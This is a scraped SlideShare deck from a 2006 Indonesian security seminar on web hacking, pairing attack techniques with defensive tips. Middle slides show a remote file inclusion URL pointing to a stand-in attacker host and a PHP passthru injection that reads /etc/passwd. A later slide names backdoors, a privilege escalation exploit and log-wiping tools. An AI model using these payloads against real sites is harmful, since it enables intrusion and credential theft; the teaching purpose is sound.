SlideShare uma empresa Scribd logo
1 de 32
Baixar para ler offline
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                             seminar
network security and hacking [ batam, 22 juli 2006 ]




                                                                           Ahmad Muammar W. K
                                                          http://www.google.com/search?q=y3dips
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                                          seminar
network security and hacking [ batam, 22 juli 2006 ]




                 theory
                     how 2 start , lookin for foods , we “ drive in “ , what we choose, web hacking
                 survive
                     user, developer, administrator
                 simulation
                     from 33 to 0
                 discussion
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                           seminar
network security and hacking [ batam, 22 juli 2006 ]




                       do we know hacking ?
                       hacker != cracker
                       hacking is not defacing
                       f.a.q 4 newbies version 1.0 at
                            (http://ezine.echo.or.id/ezine8/ez-r08-y3dips-faqfn.txt)
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::     seminar
network security and hacking [ batam, 22 juli 2006 ]




                       footprinting , scanning , enumeration
                       need to find a low security machine
                            lazy admin
                            un-patch
                            default are fault
                       more n more ….. pe-de-ka-te with target
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                     seminar
network security and hacking [ batam, 22 juli 2006 ]




                       from open port
                            80 are open, 22 are open, 25 are open, …
                       operating system vulnerability
                            windows xp sp 1, redhat 8.0
                            remote ?
                       application bug
                       authentication attack (bruteforcing, password guessing)
                       passive action (sniffing)
                       social engineering
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::   seminar
network security and hacking [ batam, 22 juli 2006 ]




                       well known services are open ?
                       ssh, smtp, https, pop3 …. also open
                       web server are open
                       should we do web hacking
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::   seminar
network security and hacking [ batam, 22 juli 2006 ]




                         hacking over http
                         hacking against web application
                         web browser attack
                         using http rules (method)
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                      seminar
network security and hacking [ batam, 22 juli 2006 ]




                            on the top of the layer
                            most of server in i-net running web server
                            how about Firewall ?
                                it’s a legal request
                                un-filtered ?
                            dynamically changed
                            run multiple application (voting, guestbook, e.t.c)
                            more friendly >< more easier
On The Top of Security
    Level Layer
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::       seminar
network security and hacking [ batam, 22 juli 2006 ]




                            web browser ? (opera, firefox)
                            command line interface (msdos, bash)
                            programming language
                            reference : advisories
•Apache
                                                •IIS                      Plugins
                                                •Tomcat                   •Perl
                                                •Netscape                 •PHP
         http request                                                     •JSP
       (clear text/ ssl)                                                  •E.t.c




                                                            Web application
                Http reply
User            (HTML,
                              Firewall
                Javascript,              Web Server
                VBscript)                                                     •MsSQL
                                                                              •Postgre
                                                                              •Mysql
                                                                              •Oracle




                                                            Database Server
Client side attack (xss, cookies stealing)


                                             Information Disclosure



                                         OS commanding (SQL, SSI, Ldap, Xpath )


                                                   Brute Force
     Web Hacking
                                                            Denial Of Service


                                            Path travesal




                                         Remote command execution (php)


                                   Etc
Sumber: http://www.webappsec.org
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                seminar
network security and hacking [ batam, 22 juli 2006 ]




                  suatu jenis serangan yang dilakukan dengan meng-
                  include-kan halaman web lain kepada suatu situs/web
                  aplikasi.
                       index.php ( bug in $file variable)
                       http://victim.com/index.php?file=readme.txt
                       http://victim.com/index.php?file=http://echo.or.id
http://advisories.echo.or.id/adv/adv33-K-159-2006.txt
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::            seminar
network security and hacking [ batam, 22 juli 2006 ]




victim




                                                               http://echo.or.id
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                             seminar
network security and hacking [ batam, 22 juli 2006 ]




                                                                       <? phpinfo();?>




         Change url “http://echo.or.id’ > http://attacker.xxx/in.txt




                                                                          Real site
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                            seminar
network security and hacking [ batam, 22 juli 2006 ]




                    suatu jenis serangan yang dilakukan dengan meng-include-kan
                    tag-tag bahasa pemrograman secara remote dan mengakibatkan
                    web yang “vulnerable” akan mengeksekusi “request” yang di
                    kirimkan.
                        viewtopic.php ( bug at highlight variable)
                        http://victim.com/viewtopic.php?t=48
                        http://victim.com/viewtopic.php?t=48&highlight=%2527.passthru
                        ($HTTP_GET_VARS[a]).%2527&a=id;pwd;cat /etc/passwd
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::   seminar
network security and hacking [ batam, 22 juli 2006 ]
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::   seminar
network security and hacking [ batam, 22 juli 2006 ]




                       defacing
                       private data stolen
                       system compromise
                       zombie ( ddos agent, botnet agent )
                       e.t.c
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                                          seminar
network security and hacking [ batam, 22 juli 2006 ]




                            Kegiatan merubah/merusak tampilan suatu website baik halaman utama (index)
                                           ataupun halaman lain yang masih terkait dalam satu url dengan
                                                                   website tersebut (folder lain ; file lain)
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::   seminar
network security and hacking [ batam, 22 juli 2006 ]
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                  seminar
network security and hacking [ batam, 22 juli 2006 ]




                                                               Ahmad Muammar W. K.
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::          seminar
network security and hacking [ batam, 22 juli 2006 ]




               always update ur system
               use a firewall, antivirus, good backup facility, etc
               using good password/pass phrase
               be carefull of social engineering
               carefully in using public facility ( cyber cafe )
               secure login/Secure connection (https ; ssh)
               update an information
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::   seminar
network security and hacking [ batam, 22 juli 2006 ]




               secure programming
               input validation
               encryption in authentication
               set error log to off
               what u need? and what u can?
               update an information
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                                 seminar
network security and hacking [ batam, 22 juli 2006 ]




                  policy (strict restriction)
                  optimal setting on server
                  function restriction
                      php (passthru , system, exec) ; mssql (xp_cmdshell, xp_regdeletekey,
                      xp_msver); mysql (system).
                  update the system (security pacth/update)
                  update an information
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                  seminar
network security and hacking [ batam, 22 juli 2006 ]




                                                               Ahmad Muammar W. K.
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::   seminar
network security and hacking [ batam, 22 juli 2006 ]




                     pe-de-ka-te
                     web hacking process
                          php injection, enumeration
                     escalating priveledge
                          ptrace-kmod
                     backdooring
                          bindtty, connect-back
                     cleaning our footprints
                          remove.c
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                  seminar
network security and hacking [ batam, 22 juli 2006 ]




                                                               Ahmad Muammar W. K.
ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id ::                     seminar
network security and hacking [ batam, 22 juli 2006 ]




                                                               http://kaos.echo.or.id

Mais conteúdo relacionado

Mais procurados

DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraKrzysztof Kotowicz
 
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian &  Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]Yihan Lian &  Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]RootedCON
 
DNS Rebinding Attack
DNS Rebinding AttackDNS Rebinding Attack
DNS Rebinding AttackFelipe Japm
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Security Bootcamp 2013 - Mitigate DDoS attack with effective cost - Nguyễn Ch...
Security Bootcamp 2013 - Mitigate DDoS attack with effective cost - Nguyễn Ch...Security Bootcamp 2013 - Mitigate DDoS attack with effective cost - Nguyễn Ch...
Security Bootcamp 2013 - Mitigate DDoS attack with effective cost - Nguyễn Ch...Security Bootcamp
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Finfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtFinfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtSecurity Bootcamp
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Aditya K Sood
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryJoe Desimone
 
Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flashjoepangus
 

Mais procurados (20)

DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
 
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian &  Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]Yihan Lian &  Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
DNS Rebinding Attack
DNS Rebinding AttackDNS Rebinding Attack
DNS Rebinding Attack
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web Malware
 
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn Việt
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP Shells
 
Security Bootcamp 2013 - Mitigate DDoS attack with effective cost - Nguyễn Ch...
Security Bootcamp 2013 - Mitigate DDoS attack with effective cost - Nguyễn Ch...Security Bootcamp 2013 - Mitigate DDoS attack with effective cost - Nguyễn Ch...
Security Bootcamp 2013 - Mitigate DDoS attack with effective cost - Nguyễn Ch...
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Finfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtFinfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn Việt
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
News bytes Oct-2011
News bytes  Oct-2011News bytes  Oct-2011
News bytes Oct-2011
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in Memory
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flash
 

Destaque

Art of Thinking [Re-write]
Art of Thinking [Re-write]Art of Thinking [Re-write]
Art of Thinking [Re-write]Ammar WK
 
Playin with Password
Playin with PasswordPlayin with Password
Playin with PasswordAmmar WK
 
Mobile hacking, pentest, and malware
Mobile hacking, pentest, and malwareMobile hacking, pentest, and malware
Mobile hacking, pentest, and malwareAmmar WK
 
Network Packet Analysis
Network Packet AnalysisNetwork Packet Analysis
Network Packet AnalysisAmmar WK
 
Web Hacking (basic)
Web Hacking (basic)Web Hacking (basic)
Web Hacking (basic)Ammar WK
 
Packet analysis (Basic)
Packet analysis (Basic)Packet analysis (Basic)
Packet analysis (Basic)Ammar WK
 

Destaque (6)

Art of Thinking [Re-write]
Art of Thinking [Re-write]Art of Thinking [Re-write]
Art of Thinking [Re-write]
 
Playin with Password
Playin with PasswordPlayin with Password
Playin with Password
 
Mobile hacking, pentest, and malware
Mobile hacking, pentest, and malwareMobile hacking, pentest, and malware
Mobile hacking, pentest, and malware
 
Network Packet Analysis
Network Packet AnalysisNetwork Packet Analysis
Network Packet Analysis
 
Web Hacking (basic)
Web Hacking (basic)Web Hacking (basic)
Web Hacking (basic)
 
Packet analysis (Basic)
Packet analysis (Basic)Packet analysis (Basic)
Packet analysis (Basic)
 

Semelhante a from 33 to 0 - A journey to be root

Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - IntroductionSQALab
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bugvwchu
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site TracingMagno Logan
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Cenzic
 
OWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsOWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsInternet Security Auditors
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresMarco Morana
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?HackIT Ukraine
 
White paper screen
White paper screenWhite paper screen
White paper screeneltincho89
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 

Semelhante a from 33 to 0 - A journey to be root (20)

Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bug
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
TS-5358
TS-5358TS-5358
TS-5358
 
TS-5358
TS-5358TS-5358
TS-5358
 
Super1
Super1Super1
Super1
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
 
OWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsOWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application Assessments
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And Countermeasures
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 
White paper screen
White paper screenWhite paper screen
White paper screen
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 

Mais de Ammar WK

Vvdp-fgd-bssn
Vvdp-fgd-bssnVvdp-fgd-bssn
Vvdp-fgd-bssnAmmar WK
 
Pen-testing is Dead?
Pen-testing is Dead?Pen-testing is Dead?
Pen-testing is Dead?Ammar WK
 
How To [relatively] Secure your Web Applications
How To [relatively] Secure your Web ApplicationsHow To [relatively] Secure your Web Applications
How To [relatively] Secure your Web ApplicationsAmmar WK
 
A Journey Into Pen-tester land: Myths or Facts!
A Journey Into Pen-tester land: Myths or Facts!A Journey Into Pen-tester land: Myths or Facts!
A Journey Into Pen-tester land: Myths or Facts!Ammar WK
 
Cybercrime: A threat to Financial industry
Cybercrime: A threat to Financial industryCybercrime: A threat to Financial industry
Cybercrime: A threat to Financial industryAmmar WK
 
Bugbounty vs-0day
Bugbounty vs-0dayBugbounty vs-0day
Bugbounty vs-0dayAmmar WK
 
Advanced Persistent Threat
Advanced Persistent ThreatAdvanced Persistent Threat
Advanced Persistent ThreatAmmar WK
 
Hacker? : it's not about Black or White
Hacker? : it's not about Black or WhiteHacker? : it's not about Black or White
Hacker? : it's not about Black or WhiteAmmar WK
 
Introduction to IOS Application Penetration Testing
Introduction to IOS Application Penetration TestingIntroduction to IOS Application Penetration Testing
Introduction to IOS Application Penetration TestingAmmar WK
 
Burp suite
Burp suiteBurp suite
Burp suiteAmmar WK
 
Network security
Network securityNetwork security
Network securityAmmar WK
 
Penetration testing
Penetration testingPenetration testing
Penetration testingAmmar WK
 
Information Security Professional
Information Security ProfessionalInformation Security Professional
Information Security ProfessionalAmmar WK
 
Handout infosec defense-mechanism-y3dips
Handout infosec defense-mechanism-y3dipsHandout infosec defense-mechanism-y3dips
Handout infosec defense-mechanism-y3dipsAmmar WK
 
Layer 7 denial of services attack mitigation
Layer 7 denial of services attack mitigationLayer 7 denial of services attack mitigation
Layer 7 denial of services attack mitigationAmmar WK
 
How To Become A Hacker
How To Become A HackerHow To Become A Hacker
How To Become A HackerAmmar WK
 
y3dips - Who Own Your Sensitive Information?
y3dips - Who Own Your Sensitive Information?y3dips - Who Own Your Sensitive Information?
y3dips - Who Own Your Sensitive Information?Ammar WK
 
idsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 networkidsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 networkAmmar WK
 
Mastering Network HackingFU - idsecconf2008
Mastering Network HackingFU - idsecconf2008Mastering Network HackingFU - idsecconf2008
Mastering Network HackingFU - idsecconf2008Ammar WK
 
Attacking Blackberry For Phun and Profit
Attacking Blackberry For Phun and ProfitAttacking Blackberry For Phun and Profit
Attacking Blackberry For Phun and ProfitAmmar WK
 

Mais de Ammar WK (20)

Vvdp-fgd-bssn
Vvdp-fgd-bssnVvdp-fgd-bssn
Vvdp-fgd-bssn
 
Pen-testing is Dead?
Pen-testing is Dead?Pen-testing is Dead?
Pen-testing is Dead?
 
How To [relatively] Secure your Web Applications
How To [relatively] Secure your Web ApplicationsHow To [relatively] Secure your Web Applications
How To [relatively] Secure your Web Applications
 
A Journey Into Pen-tester land: Myths or Facts!
A Journey Into Pen-tester land: Myths or Facts!A Journey Into Pen-tester land: Myths or Facts!
A Journey Into Pen-tester land: Myths or Facts!
 
Cybercrime: A threat to Financial industry
Cybercrime: A threat to Financial industryCybercrime: A threat to Financial industry
Cybercrime: A threat to Financial industry
 
Bugbounty vs-0day
Bugbounty vs-0dayBugbounty vs-0day
Bugbounty vs-0day
 
Advanced Persistent Threat
Advanced Persistent ThreatAdvanced Persistent Threat
Advanced Persistent Threat
 
Hacker? : it's not about Black or White
Hacker? : it's not about Black or WhiteHacker? : it's not about Black or White
Hacker? : it's not about Black or White
 
Introduction to IOS Application Penetration Testing
Introduction to IOS Application Penetration TestingIntroduction to IOS Application Penetration Testing
Introduction to IOS Application Penetration Testing
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Network security
Network securityNetwork security
Network security
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Information Security Professional
Information Security ProfessionalInformation Security Professional
Information Security Professional
 
Handout infosec defense-mechanism-y3dips
Handout infosec defense-mechanism-y3dipsHandout infosec defense-mechanism-y3dips
Handout infosec defense-mechanism-y3dips
 
Layer 7 denial of services attack mitigation
Layer 7 denial of services attack mitigationLayer 7 denial of services attack mitigation
Layer 7 denial of services attack mitigation
 
How To Become A Hacker
How To Become A HackerHow To Become A Hacker
How To Become A Hacker
 
y3dips - Who Own Your Sensitive Information?
y3dips - Who Own Your Sensitive Information?y3dips - Who Own Your Sensitive Information?
y3dips - Who Own Your Sensitive Information?
 
idsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 networkidsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 network
 
Mastering Network HackingFU - idsecconf2008
Mastering Network HackingFU - idsecconf2008Mastering Network HackingFU - idsecconf2008
Mastering Network HackingFU - idsecconf2008
 
Attacking Blackberry For Phun and Profit
Attacking Blackberry For Phun and ProfitAttacking Blackberry For Phun and Profit
Attacking Blackberry For Phun and Profit
 

Último

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
